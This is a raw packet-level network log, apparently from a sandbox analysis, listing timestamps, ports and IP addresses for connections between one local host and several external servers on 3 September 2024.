Sep 3, 2024 17:13:19.386533976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386544943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386545897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386558056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386569023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386579990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386590958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386600971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386600971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386601925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.386615992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.386646986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387228012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387244940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387254953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387268066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387279987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387290001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387301922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387307882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387315035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387320042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387329102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387341022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387350082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387356997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387356997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387363911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.387387037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.387418032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.460895061 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.460967064 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.478178024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478188992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478199959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478259087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478291035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478311062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478322983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478337049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478348970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478358984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478370905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478405952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478724003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478734970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478744030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478759050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478771925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.478799105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478799105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.478827000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479264021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479274988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479284048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479295015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479305983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479317904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479321003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479345083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479382992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479796886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479809046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479820013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479830980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479846954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479857922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479867935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479867935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479882002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479890108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479890108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479893923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479907036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479918003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479919910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.479957104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.479957104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480145931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480158091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480169058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480180979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480191946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480211973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480228901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480256081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480293036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480304003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480313063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480324984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480334997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480346918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480359077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480365038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480370045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480385065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480395079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480403900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480406046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480418921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480427980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480431080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480442047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480453968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480500937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480665922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480676889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480686903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480703115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480715036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480715036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480726004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480740070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480741978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480751038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480758905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480762959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480798006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480806112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480806112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480818033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480828047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480839014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480849981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480859995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480869055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480870008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480871916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480885029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480895042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480906963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480910063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480910063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.480912924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.480973005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481617928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481635094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481646061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481657982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481667995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481673002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481679916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481695890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481708050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481712103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481720924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481730938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481741905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481743097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481755018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481760979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481765985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481772900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481777906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481790066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481801987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481807947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.481815100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481827974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481838942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481848955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.481857061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482089996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482100964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482112885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482119083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482124090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482124090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482129097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482142925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482144117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482144117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482153893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482170105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482178926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482182980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482194901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482204914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482214928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482224941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482224941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482224941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482237101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482249022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482260942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482261896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482271910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482283115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482297897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482309103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482312918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482312918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482319117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482362032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482362032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.482918024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482928991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482939959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.482953072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.483002901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.483035088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.508963108 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.512183905 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.512267113 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.512372017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.512423038 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.512965918 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.512976885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.512993097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513010979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513022900 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513041019 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513051987 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513113022 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513242006 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513257027 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513300896 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513385057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513437986 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513462067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513473988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513523102 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.513597965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.513756990 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.514753103 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:19.519515991 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.549451113 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.555556059 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.560566902 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.574110031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574179888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574183941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574193001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574227095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574265957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574274063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574285030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574320078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574342012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574367046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574373960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574385881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574423075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574460030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574460030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574480057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574491024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574501991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574574947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574630022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574641943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574651003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574670076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574698925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574733019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574738979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.574743986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.574872971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575139046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575217009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575227976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575299025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575334072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575345039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575359106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575370073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575381041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575419903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575419903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575475931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575539112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575550079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575553894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575562000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575618029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575762033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575773001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575783014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575792074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575803041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575818062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575860023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.575910091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575921059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575931072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575941086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.575969934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576004982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576176882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576186895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576196909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576209068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576205969 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.576220036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576232910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576242924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576250076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576255083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576261044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576267004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576286077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576308966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576560020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576570988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576581001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576591969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576597929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576613903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576657057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576689959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576705933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576745987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576773882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576812029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576841116 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.576864004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576873064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576884985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.576921940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.576992035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577003956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577008963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577024937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577038050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577040911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577054977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577121019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577178001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577188969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577244997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577289104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577299118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577307940 CEST	80	49730	52.212.52.84	192.168.2.8
